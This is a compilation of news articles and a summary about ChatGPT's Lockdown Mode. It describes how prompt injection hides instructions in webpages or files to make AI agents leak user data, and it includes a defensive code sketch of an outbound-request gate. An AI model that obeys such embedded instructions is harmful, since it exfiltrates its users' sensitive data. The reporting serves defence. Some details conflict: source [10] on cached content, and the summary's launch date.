11 Sources
[1]
How ChatGPT's new Lockdown mode protects you from data theft (and what else it does)
ZDNET's key takeaways
* Lockdown mode aims to prevent data theft from attackers.
* This mode is now available to all ChatGPT users.
* It does limit what you can do on the live web.
AIs can be vulnerable to different security threats. And one of the biggest is prompt injection. By feeding malicious commands into your prompts, an attacker could infiltrate your chats, access external files and services, and steal your personal data. An optional setting in ChatGPT called Lockdown mode tries to protect your account by limiting what you can do and where.
(Disclosure: Ziff Davis, ZDNET's parent company, filed an April 2025 lawsuit against OpenAI, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.)
First kicked off in February to subscribers of ChatGPT for Enterprise, Edu, Healthcare, and Teachers, Lockdown mode is now also available to all other plans, including Free, Go, Plus, Pro, and Business. Though accessible to everyone who uses ChatGPT, the option is designed for people and organizations that work with sensitive information in need of extra protection.
To combat data theft through prompt injection, Lockdown mode limits outbound network requests, such as those to the internet or to an external file service. The idea is to stop any live sensitive information from falling into the hands of an attacker.
The mode doesn't prevent actual prompt injection attacks. A hacker could still infect your prompts with malicious commands that tap into cached web content or uploaded files. Plus, there are some decided tradeoffs, namely those that involve live web searches or information. With Lockdown mode enabled, you can't perform any of the following tasks:
* Live web browsing. ChatGPT can't access the live web and instead is limited to cached content. That means any search results may be out of date or even unavailable.
* View images from the web. ChatGPT can't display images in regular responses or retrieve them from the live web. You can still upload your own images and ask the AI to generate an image.
* Deep research. Deep research is unavailable.
* Agent mode. Agent mode is also unavailable.
* Canvas networking. You can't use code that you generate through the Canvas tool to access your network.
* File downloads. ChatGPT can't download files to analyze them, though it can still handle any files you upload.
With these restrictions in mind, you may still want to try Lockdown mode if you're working with highly sensitive or confidential data, either personally or professionally. Just keep in mind that you'll be limited with any requests that need access to the live web or a live file service.
Lockdown mode is in the process of rolling out, so it may not yet be accessible to all accounts. To enable it on your end, make sure you're signed in to ChatGPT with your account. Click your account name in the lower left and select Settings. At the Settings window, select Security, scroll down to the section for Advanced Security, and then turn on the switch for Lockdown Mode. A pop-up window explains the restrictions of this mode. To proceed, click the Turn on button.
[2]
OpenAI Rolls Out Lockdown Mode to Fight Prompt Injection Attacks
The new feature promises increased protection against these types of attacks, but you'll have to sacrifice a lot of functionality, including live web browsing and image retrieval from the web. As LLM use has skyrocketed in recent years, researchers are increasingly identifying prompt injection attacks as a critical security issue, with such attacks growing in prevalence year-on-year. These are attacks where a bad actor misleads an AI model by injecting malicious instructions into a conversation. Hackers may hide instructions inside content that an AI processes, for example, a PDF file or website, with the ultimate aim of extracting valuable company data. Now, OpenAI is rolling out Lockdown Mode, an optional security setting that limits its products' ability to connect to the web or external services. It does this by limiting outbound network requests, though at the expense of disabling or limiting some useful features. This means that, in a worst-case scenario, if you do encounter malicious prompts, ChatGPT may not be able to share any data with third parties, acting as a final line of defence. There are, however, some pretty significant trade-offs you'll need to make for the added security. Once enabled, web browsing is limited to accessing only cached content, meaning you'll have limited access to freshly updated web pages. Meanwhile, ChatGPT may not display images in regular responses or retrieve images from the web, but you can still upload image files and generate your own images. In addition, ChatGPT won't be able to download files for data analysis, and users cannot approve Canvas-generated code to access the network. Deep Research and Agent Mode will also be disabled, and you won't be able to put ChatGPT into Developer Mode. Though Lockdown Mode is available for all account types and workspaces, OpenAI says it's only intended for users and organizations handling sensitive data. 
If you think the trade-offs are worth the security benefits and you'd like to enable Lockdown Mode, head to Settings. Then select Security and, under Advanced Security, turn on Lockdown Mode. Finally, select Turn On when the tool asks you to confirm. OpenAI notes that while the new feature is designed to "substantially reduce" the risk of successful prompt injection-based data exfiltration in its products, it does not guarantee protection against newly discovered techniques or combinations of methods. The risks of prompt injection attacks continue to plague new products coming out of the AI industry. In August 2025, researchers at Anthropic were able to compromise users of its Claude for Chrome browser extension with a 23.6% success rate via prompt injections while the product was still in beta. Meanwhile, that same month, researchers from Brave demonstrated that Perplexity's Comet AI browser was vulnerable to these types of attacks.
[3]
ChatGPT just gave Free users a powerful defense against prompt injection attacks
* OpenAI's Lockdown Mode blocks live outbound network requests to stop LLM hijacking attempts.
* It disables or limits features that make external calls, trading some functionality for privacy.
* Lockdown Mode is now rolling out to Free, Plus, Pro, Go, and self-serve Business ChatGPT accounts.
The world of cybersecurity was almost totally reshaped with the introduction of LLMs. We saw both hackers and security experts use the new tech to develop bigger and better programs to fight one another, and the battle is still escalating to this day. However, the rise of AI also created a new world of attacks where hackers are hijacking LLMs to do their bidding. OpenAI's Lockdown Mode was an answer to these attacks, but it wasn't available to everyone; at least, until today. Now, the company is allowing everyone, even Free users, to stay safe while using ChatGPT.
ChatGPT's Lockdown Mode arrives for all users
It's good to have if you're worried about privacy
Back in February, OpenAI published a blog post detailing what Lockdown Mode is. Basically, when someone sends an AI to perform a task on the web, malicious actors can sometimes 'lace' their webpages and materials with prompts. These attempt to 'hijack' the AI and have it send personal data to the attacker, all without the user knowing. To solve this, Lockdown Mode was introduced. When enabled, it prevents ChatGPT from making live outbound network requests. As such, if a bad actor tries to trick your LLM into surrendering your personal data, Lockdown Mode will step in and stop ChatGPT from sending anything over. It also disables or limits specific features that depend on outbound requests, but it's good if you're privacy-minded.
When Lockdown Mode first released, it was only available to select users. Now, the blog post has been updated to read the following:
Lockdown Mode is rolling out to personal ChatGPT accounts as well as self-serve ChatGPT Business accounts. First introduced for ChatGPT enterprise plans, Lockdown Mode is an optional setting for people and teams who want a more conservative ChatGPT experience when working with sensitive information or connected features.
The Lockdown Mode documentation explicitly confirms that "Free, Go, Plus, and Pro, and self-serve ChatGPT Business accounts" can now use it. It may take a while for it to fully roll out, but you can check if you have it by going to ChatGPT's Settings, then Security. You should see Lockdown Mode under the Advanced Security section with a toggle.
By Simon Batt
[4]
OpenAI rolls out a Lockdown Mode for extra protection against prompt injection attacks - Engadget
OpenAI has begun rolling out Lockdown Mode, an optional security setting designed to offer users advanced protection from prompt injection attacks. For the unfamiliar, prompt injection is a form of social engineering that is specific to conversational chatbots. As AI systems have become better at pulling information from the internet, people have begun hiding malicious instructions on webpages and other places to try and trick those systems. OpenAI is billing Lockdown Mode as a sort of last line of defense against prompt injections, building on the robust protections that it says it already offers through ChatGPT, its models and backend systems. "Lockdown Mode is not intended for everyone," OpenAI explains. "It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection." To that end, enabling Lockdown Mode limits some of the features OpenAI offers through ChatGPT and its other products. For instance, you can still use image generation and upload photos to ChatGPT, but it may not pull images from the internet or display any images inside of a response. The chatbot also cannot download files to analyze, though you can still manually upload documents if you want its insight. Other features, such as Deep Research and Agent Mode are disabled completely. "Lockdown Mode does not change memory, file uploads, the ability to share a conversation, or whether your conversations may be used to improve models," OpenAI adds. "Many of these settings are separately configurable by workspace admins." The company also notes Lockdown Mode won't stop prompt injections from appearing in content ChatGPT processes. Instead, it's designed to prevent an attacker from extracting sensitive data from your account by limiting network requests that someone could exploit. Lockdown Mode is available to all personal accounts, including those using ChatGPT through OpenAI's free tier. 
To activate it, open ChatGPT's settings menu and select Safety and security. Under Advanced security, tap Lockdown mode and flip on the toggle. You can temporarily disable the additional protection by selecting Manage from the status message that appears above the chat window and selecting Turn off for this chat. Separately, OpenAI is rolling out an active session manager that allows users to see any devices or browsers that have been used to access their account. From there, the company offers the option to log out of individual or all sessions at once. Just note the latter can take up to 30 minutes to complete. "If you suspect unauthorized account activity, change your password if you use one, review your sign-in methods, and contact OpenAI Support," the company adds.
[5]
ChatGPT can be hijacked without you knowing. Lockdown Mode is the fix
Lockdown Mode restricts features like live web browsing and Deep Research across all ChatGPT plans, though OpenAI acknowledges risks from uploaded files remain. OpenAI has launched a new security feature in ChatGPT called Lockdown Mode, designed to provide additional protection against so-called "prompt injection attacks." A prompt injection attack is when someone crafts a deceptive prompt in an attempt to trick the LLM into following malicious instructions and/or revealing sensitive information. These deceptive prompts are often hidden within web pages and other data sources, which are easily missed by humans but still read and processed by LLMs. Prompt injection attacks have been used to do all sorts of things, like hijacking Perplexity's AI browser, controlling smart home devices via Google Gemini, and stealing personal information via compressed images and Google Calendar. First announced back in February, Lockdown Mode will now restrict and/or disable several ChatGPT features when enabled, including live web browsing (in favor of cached content), the retrieval and display of web-based images, Deep Research, and Agent Mode. OpenAI emphasizes that this feature can't completely eliminate the risk of prompt injection attacks, as malicious instructions could always be present in uploaded files or cached content. As of this writing, Lockdown Mode is rolling out to all ChatGPT account types, including Free, Go, Plus, and Pro plans. If you aren't seeing Lockdown Mode in your settings, it may not have rolled out to you yet and you'll have to wait a bit longer for it.
[6]
The best new ChatGPT feature is one most people will never use
For years, the biggest conversation around AI has been what these tools can do. They can browse the web, analyze documents, connect to your apps, conduct research, and increasingly act on your behalf. But as AI systems become more capable, another question has become harder to ignore: what happens when an AI assistant is tricked into handing over information it shouldn't? OpenAI's new Lockdown Mode is its latest answer to that problem. Available across all ChatGPT account types, Lockdown Mode is an optional security setting designed for people and organizations handling sensitive information. The trade-off is that you get stronger protection against certain forms of data theft, but you lose access to some of ChatGPT's most powerful features.
This new security feature makes ChatGPT a homebody
Lockdown Mode primarily exists to reduce the risk of data exfiltration from prompt injection attacks. Prompt injection has emerged as one of the most difficult security challenges in the AI era. Instead of attacking software directly, malicious instructions are hidden inside documents, websites, spreadsheets, emails, or other content that an AI system might process. If the model follows those hidden instructions, an attacker may be able to manipulate its behavior.
OpenAI is careful to point out that Lockdown Mode does not stop prompt injections from appearing in content. A malicious instruction could still exist inside an uploaded file or cached webpage. What Lockdown Mode aims to prevent is the final, potentially most damaging step: getting sensitive information out. To accomplish that, OpenAI dramatically restricts what ChatGPT can communicate with outside its own environment. Once enabled, live web browsing is essentially shut down. 
ChatGPT can only access cached content, which means search results may be limited, outdated, or unavailable altogether -- Deep Research disappears, Agent Mode is disabled, and network access through Canvas-generated code is blocked. ChatGPT also loses the ability to download files for analysis. While users can still upload images and create AI-generated visuals where supported, ChatGPT won't be able to fetch images from the web or display them in normal responses. So, Lockdown Mode turns ChatGPT from a highly connected AI assistant into something much more isolated.
A feature most people will never need
That's not a criticism. In fact, one of the most interesting things about Lockdown Mode is how openly OpenAI acknowledges that it isn't designed for everyone. But security professionals have long accepted that stronger protection usually comes at the expense of convenience. The closest comparison is probably Apple's "Lockdown Mode," introduced several years ago. Apple built it for people at risk of highly sophisticated cyberattacks, not average iPhone owners. OpenAI appears to be taking a similar approach here. For users dealing with highly sensitive information, limiting network requests can be worth the sacrifice. If an AI system cannot freely interact with external services, there are simply fewer opportunities for confidential information to leave the environment.
The move also reflects a broader shift happening across the AI industry. Earlier conversations centered around whether AI could access more data and more services. Increasingly, companies are asking how much access these systems should have in the first place. That question becomes especially important as AI assistants gain the ability to browse websites, connect to business software, read internal documents, and perform actions across multiple services. OpenAI's answer isn't to eliminate those capabilities. Instead, it's offering users a choice. 
The rise of AI security controls
Lockdown Mode is perhaps most notable for what it says about the future of AI products. For years, software security has largely focused on protecting people from malicious programs. AI introduces a different challenge: protecting AI systems from malicious information. That's a much messier problem. A prompt injection can be hidden in a webpage, embedded inside a document, or disguised as normal text. Detecting every possible attack is difficult, which is why OpenAI describes prompt injection as an ongoing research challenge rather than a solved problem. Lockdown Mode acknowledges that reality. Rather than claiming complete protection, it reduces the potential damage if something slips through existing defenses.
For enterprise customers, the feature becomes even more granular. Workspace administrators can create custom Lockdown Mode roles, restrict apps and connectors, and carefully decide which actions employees are allowed to perform. OpenAI also recommends limiting write-enabled integrations, since they create opportunities for information to leave trusted environments.
In many ways, Lockdown Mode feels like a sign of where AI security is heading. The more powerful AI assistants become, the more users will need tools to dial back their powers when the situation demands it. That may not be as exciting as a new reasoning model or an AI agent that can book your flights. But for organizations handling sensitive information, it could be far more important. Sometimes the smartest AI isn't the one that can do everything. It's the one that knows when not to.
[7]
OpenAI Says New Lockdown Mode Can Help Prevent Sensitive Data Leaks
Lockdown Mode cannot be used simultaneously with Developer Mode
OpenAI has announced a new security feature for ChatGPT to safeguard users and organisations from prompt injection attacks. Dubbed Lockdown Mode, it is an optional setting within the AI chatbot that is claimed to protect sensitive user data from being exposed. As per the company, it is available across all ChatGPT account types and workspaces, including personal, business, and enterprise accounts. Lockdown Mode restricts several ChatGPT capabilities that rely on internet access or external services when enabled.
OpenAI's Lockdown Mode Feature
OpenAI says Lockdown Mode is designed to reduce the risk of data exfiltration by limiting outbound network requests that could be used to transfer data to an attacker. On its support page, the company emphasised that the feature does not prevent prompt injections from appearing in content processed by ChatGPT, but focuses on blocking the unauthorised transfer of information, claiming it to be one of the most critical stages of an attack.
Prompt injection attacks, notably, happen when malicious instructions are hidden within content processed by an AI model, such as web pages, files, or documents. Such instructions can influence a chatbot's behaviour and potentially trick it into revealing sensitive information.
When Lockdown Mode is enabled, several ChatGPT features that are linked to the internet become restricted. For instance, the live web browsing is limited to cached content, while Deep Research and Agent Mode are completely unavailable. Apart from this, ChatGPT also loses the ability to download files for data analysis, although manual upload will continue to work. The company notes that during such instances, search results may be incomplete or outdated. Lockdown Mode is also claimed to affect how apps, connectors, and external integrations function. 
While synced experiences will continue to work for personal accounts and self-serve ChatGPT Business accounts, live connector access and write actions are blocked. Meanwhile, shopping-agent features and financial integrations will also be unavailable while Lockdown Mode is active.
The San Francisco-based company further revealed that Lockdown Mode does not affect memory, conversation sharing, image generation, or whether chats are used to improve its AI models. It also does not impact network access within Codex. Lockdown Mode cannot be used simultaneously with Developer Mode, as enabling one feature automatically disables the other.
How to Enable Lockdown Mode in ChatGPT
Users with eligible personal accounts or self-serve ChatGPT Business subscriptions can enable Lockdown Mode directly from the Settings menu. Here's how: Lockdown Mode is rolling out to eligible personal accounts, including Free, Go, Plus, and Pro, and self-serve ChatGPT Business accounts.
[8]
OpenAI rolls out Lockdown Mode for users handling sensitive information
OpenAI has launched Lockdown Mode to combat prompt injection attacks, a security feature designed for users handling sensitive data. This mode restricts live web browsing and image retrieval from the internet, aiming to prevent data exfiltration by limiting outbound network requests. It is available to eligible personal and business accounts.
OpenAI has introduced a new security feature called Lockdown Mode, aimed at reducing the risk of prompt injection attacks that can expose sensitive information. According to the company, the feature is not intended for all users. Instead, it is "designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection."
The feature works by limiting certain capabilities that could potentially be exploited by attackers. When enabled, Lockdown Mode disables live web browsing, meaning ChatGPT can only access cached web content. It also turns off the retrieval and display of images from the internet, although users can still generate images. Deep Research and Agent Mode are also unavailable while the setting is active. OpenAI said the feature is being rolled out to eligible personal accounts, including Free, Go, Plus and Pro users, as well as self-serve ChatGPT Business accounts.
What is prompt injection?
"Prompt injection is a type of social engineering attack specific to conversational AI," according to OpenAI's website. "Prompt injections occur when a third-party -- not the user nor the AI -- misleads the model by injecting malicious instructions into the conversation context." In simple terms, prompt injection is similar to phishing. Just as a scam email may try to trick a person into revealing sensitive information, a prompt injection attempts to manipulate an AI system into carrying out actions or revealing data it should not. OpenAI stressed that Lockdown Mode does not stop prompt injections from appearing in content processed by ChatGPT. 
"For example, a prompt injection could appear in cached web content or in an uploaded file, and could still affect the behaviour or accuracy of a response," it said. The goal, instead, is to make it harder for sensitive information to be transferred to attackers by restricting outbound network requests. The company also noted that Lockdown Mode does not affect memory, file uploads, conversation sharing, or whether chats may be used to improve models.
How to activate
For eligible personal accounts and self-serve ChatGPT Business accounts:
* Go to Settings.
* Select Security.
* Under Advanced security, turn on Lockdown Mode.
* In the confirmation window, select Turn on.
OpenAI said Lockdown Mode and Developer Mode cannot be used together. Enabling one automatically disables the other. When Lockdown Mode is active, a status message appears above the composer. Users can temporarily disable it for a specific chat through the Manage option or the more-options menu, and re-enable it later if needed.
[9]
Inside ChatGPT's New Lockdown Mode: Is Your Data Safer?
Sam Altman's OpenAI tops the headlines with the announcement of its new security mode, called Lockdown mode. In the same vein of "security," the AI product is receiving mixed reactions from techies.
OpenAI's Lockdown Mode - What Does it Do?
As per the announcement by the San Francisco-based giant, the new security mode was introduced to strengthen security settings, especially for users and organizations that use their LLM to handle sensitive information. This safeguard mode will detect and protect against attempts to expose sensitive data to the wrong hands. OpenAI-owned ChatGPT also gets an added feature called the "Active Session Manager" tool. Using this tool, users can view logged-in devices and even browsers, and can remotely sign out from their account from devices that are not needed.
"Lockdown Mode is not intended for everyone. It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection," OpenAI stated. This mode comes into place as there has been an increase in the trend of "prompt injection attacks".
What are Prompt Injection Attacks?
Rather than going directly and exfiltrating data, hackers have now developed a new method where attackers can hide instructions like code documents inside a webpage and upload it to the LLM, and while going through the codes or documents, the attackers are able to manipulate the AI system and get access to sensitive information.
[10]
OpenAI Unveils Lockdown Mode to Protect Data from Prompt Injection Attacks
The issue of prompt injection attacks has been discussed for several months now with cybersecurity experts warning of massive data thefts via this vulnerability
Six months after cautioning the world about the dangers of a potential prompt injection attack on AI browsers, including its own ChatGPT Atlas, OpenAI has now announced a new feature that it claims would provide additional protection against such instances. The company says that the new Lockdown Mode would disable live web browsing, the retrieval and display of images from the web, deep research, and potential agentic modes. In other words, once the lockdown is initiated, users won't be able to access cached content. Prompt injection attacks use malicious chatbot instructions hidden in webpages and other content types.
Lockdown Mode is an optional advanced security setting that limits many tools and capabilities in OpenAI products that can connect to the web or external services. It is designed to reduce the risk of data exfiltration from prompt injection attacks by limiting outbound network requests, at the expense of disabling or limiting some useful features, the company said in a post.
However, OpenAI warns that even with the Lockdown Mode turned on, its AI chatbot could remain vulnerable to prompt injections that appear "in cached web content or in an uploaded file, and could still affect the behaviour or accuracy of a response." However, the goal of the new release is to reduce such likelihood and sensitive data getting shared in the process.
"Lockdown Mode is not intended for everyone. It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection," OpenAI says, while noting that it is rolling out Lockdown Mode to self-serve ChatGPT Business Accounts and eligible personal accounts. In an earlier note, OpenAI had described the threat of prompt injections. 
"Prompt injection is a type of social engineering attack specific to conversational AI. Early AI systems were conversations between a single user and a single AI agent. "In AI products today, conversations may include content from many sources, including the internet. Prompt injections occur when a third-party -- not the user nor the AI -- misleads the model by injecting malicious instructions into the conversation context," the note said. Just as phishing emails or scams on the web try to trick people into giving away sensitive information, prompt injections try to trick AIs into doing something you did not ask for, OpenAI had said while noting that the company was building layered defences designed to carry out the user's intended task even when someone is trying to mislead them.
[11]
OpenAI Rolls Out Lockdown Mode to Reduce Prompt Injection Risks
OpenAI has begun rolling out a new security feature called 'Lockdown Mode' across its products, making the feature available to eligible Free, Go, Plus, Pro, and self-serve ChatGPT Business accounts. The company said the optional setting targets people and organisations that handle sensitive information and seek stronger protection against data exfiltration risks linked to prompt-injection attacks. The feature restricts several web-connected capabilities, including Deep Research, Agent Mode, and live web browsing.
However, OpenAI acknowledged that the feature is not a complete solution. In its FAQ, the company said Lockdown Mode is designed to "substantially reduce the risk of prompt injection-based data exfiltration" but "does not guarantee data exfiltration cannot happen". OpenAI added that risks may still arise through third-party apps that remain enabled, cached data, unforeseen combinations of capabilities, or newly discovered attack techniques.
What is prompt injection?
Prompt injection is a technique in which attackers hide malicious instructions inside content that an AI system reads, such as webpages, documents, emails, PDFs, or database records. If the model follows those instructions, it may ignore its original directions, reveal sensitive information to attackers, perform unintended actions, or generate misleading outputs.
What Lockdown Mode restricts:
OpenAI said that Lockdown Mode disables or limits several features that can connect to the web or external services.
* Live web browsing: ChatGPT can access only cached content, which may be limited or outdated.
* Deep Research: Disabled.
* Agent Mode: Disabled.
* Image support: ChatGPT may not retrieve or display images from the web, although users can still upload and generate images.
* Canvas networking: Users cannot approve Canvas-generated code for internet access.
* File downloads: ChatGPT cannot download files for analysis, though manually uploaded files continue to work.
* Live connector access and connector write actions: Restricted for personal and self-serve Business accounts.
* Shopping agent and Finance experiences: These features are unavailable in Lockdown Mode.
At the same time, OpenAI clarified that Lockdown Mode does not change memory settings, file uploads, conversation sharing, or how the company uses conversations to improve its models.
How Lockdown Mode works and app risk categories:
OpenAI said Lockdown Mode builds on existing protections such as sandboxing, URL-based data exfiltration safeguards, monitoring systems and enterprise controls. Rather than blocking prompt injections outright, it aims to prevent the final stage of an attack by limiting outbound network requests that could transfer sensitive information to an attacker. The company also categorised apps and actions by risk level:
* High risk: Read or write actions involving untrusted apps. OpenAI advised users to enable only trusted applications.
* High risk: Write actions in trusted apps where the visibility of resulting actions is broad or uncertain.
* Medium risk: Sync connectors that do not make live network requests but can still expose sensitive data already synced with OpenAI.
* Medium risk: Read actions in trusted apps. These do not create side effects but can still expose sensitive information.
* Medium risk: Write actions in trusted apps with limited visibility. OpenAI recommends enabling these only when users are confident that trusted parties alone can see any resulting actions.
Why does this matter?
OpenAI said prompt injection is "not currently a major risk," yet security researchers increasingly view it as one of the most serious threats facing AI systems. OWASP ranks prompt injection as the top security risk for LLM applications, warning that attackers can hide malicious instructions in websites, documents or emails that AI models later process. In one case, a user tricked a Chevrolet dealership chatbot into selling them a car for $1. 
The UK's National Cyber Security Centre (NCSC) has also warned that prompt injection attacks may never be fully mitigated because LLMs do not inherently distinguish between instructions and data.
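The egress restriction and the app risk categories described above can be modelled as a gate in front of an agent's tool dispatcher. This is an added sketch, not OpenAI's implementation: `ToolCall`, `gate`, `risk_tier`, the cache contents, the example URLs and the rule that lockdown denies high-risk connector actions are all assumptions made for illustration.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ToolCall:                        # hypothetical tool-call record
    kind: str                          # "fetch", "sync_read", "connector_read", "connector_write"
    target: str                        # URL for fetch, app name otherwise
    trusted_app: bool = False
    limited_visibility: bool = False   # write result visible to trusted parties only

# Constructed cache: content retrieved earlier, served without a network request.
CACHE = {"https://docs.example/handbook": "cached handbook text"}

def risk_tier(call: ToolCall) -> str:
    """Map a connector action to the article's high/medium categories."""
    if call.kind == "sync_read":
        return "medium"                # no live request, but synced data is exposed
    if not call.trusted_app:
        return "high"                  # any read or write in an untrusted app
    if call.kind == "connector_write" and not call.limited_visibility:
        return "high"                  # broad or uncertain visibility of the write
    return "medium"                    # trusted read, or trusted limited-visibility write

def gate(call: ToolCall, lockdown: bool) -> tuple[bool, str]:
    """Decide whether the dispatcher may execute a call the model requested."""
    if call.kind == "fetch":
        if not lockdown:
            return True, "live request"
        if call.target in CACHE:
            return True, "cache hit, nothing leaves the host"
        return False, "lockdown: no live outbound request"
    tier = risk_tier(call)
    # Assumed policy: under lockdown only medium-risk connector actions run.
    if lockdown and tier == "high":
        return False, "lockdown: high-risk connector action"
    return True, f"{tier}-risk connector action"

def demo() -> list[tuple[bool, str]]:
    # Constructed calls, as a model might emit after reading injected content.
    calls = [
        ToolCall("fetch", "https://docs.example/handbook"),
        ToolCall("fetch", "https://collector.example/?d=<conversation-data>"),
        ToolCall("connector_write", "tracker", trusted_app=True),
        ToolCall("connector_read", "tracker", trusted_app=True),
    ]
    return [gate(c, lockdown=True) for c in calls]

if __name__ == "__main__":
    for allowed, reason in demo():
        print("ALLOW" if allowed else "DENY ", reason)
```

The gate never inspects the prompt: the second call is refused because it would need a live request, which is the sense in which the control targets the final stage rather than the injection itself.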
OpenAI has expanded its ChatGPT Lockdown Mode to all users, including free tier accounts, offering enhanced protection against prompt injection attacks that could steal sensitive data. The optional security setting restricts outbound network requests to prevent data exfiltration, though it limits features like live web browsing, Deep Research, and Agent Mode. While the feature doesn't stop prompt injections entirely, it acts as a final defense layer by blocking ChatGPT from sending information to attackers.
OpenAI has rolled out ChatGPT Lockdown Mode to all users across Free, Go, Plus, Pro, and self-serve Business accounts, marking a significant expansion of a security feature initially launched in February 2025 for Enterprise, Edu, Healthcare, and Teachers plans [1][3]. This optional security setting addresses the growing threat of prompt injection attacks, which researchers increasingly identify as a critical AI security vulnerability with attacks growing in prevalence year-on-year [2]. The feature is designed specifically for people and organizations handling sensitive data who need stricter protection from data exfiltration risks related to prompt injection [4].
Source: TelecomTalk
Prompt injection attacks represent a form of social engineering specific to conversational chatbots and LLM systems [4]. Bad actors hide malicious instructions inside content that AI processes—such as webpages, PDF files, or other materials—attempting to hijack the AI and extract valuable company data or personal information [2][3]. These attacks have already demonstrated real-world impact: researchers at Anthropic compromised Claude for Chrome browser extension users with a 23.6% success rate via prompt injections in August 2025, while Brave researchers showed Perplexity's Comet AI browser was similarly vulnerable [2]. By feeding malicious commands into prompts, attackers could infiltrate chats, access external files and services, and steal personal data—all without the user knowing [1].
Source: ET
To protect users from data theft, ChatGPT Lockdown Mode limits outbound network requests to the internet or external file services, preventing live sensitive information from falling into attackers' hands [1]. When enabled, the feature prevents ChatGPT from making live outbound network requests, acting as a final line of defense that stops the LLM from sending personal data to attackers even if malicious prompts successfully hijack the system [3][2]. OpenAI positions this as building on robust protections already offered through ChatGPT, its models, and backend systems [4]. However, the company acknowledges that while the feature is designed to substantially reduce the risk of successful prompt injection-based data exfiltration, it does not guarantee protection against newly discovered techniques or combinations of methods [2].
Enabling this optional security setting comes with significant functional limitations. Live web browsing is restricted to cached content only, meaning search results may be out of date or unavailable [1][2]. ChatGPT cannot display images in regular responses or retrieve images from the web, though users can still upload their own images and generate new ones [1][4]. Deep Research and Agent Mode are completely disabled [1][5]. Canvas-generated code cannot access the network, and ChatGPT cannot download files for data analysis, though manually uploaded files can still be processed [1][2]. OpenAI notes the mode doesn't change memory, file uploads, conversation sharing capabilities, or whether conversations may be used to improve models [4].
Source: ZDNet
OpenAI emphasizes that Lockdown Mode is not intended for everyone but specifically for users and organizations handling sensitive data who want a more conservative ChatGPT experience when working with confidential information or connected features [3][4]. The feature doesn't prevent actual prompt injection attacks from occurring—hackers could still infect prompts with malicious instructions that tap into cached web content or uploaded files [1]. Users can enable the feature by navigating to Settings, selecting Security, and turning on Lockdown Mode under Advanced Security [1][3]. The feature is currently rolling out and may not yet be accessible to all accounts [1][5]. Separately, OpenAI is rolling out an active session manager that allows users to see devices or browsers accessing their account, with the option to log out of individual or all sessions at once [4].

Summarized by Navi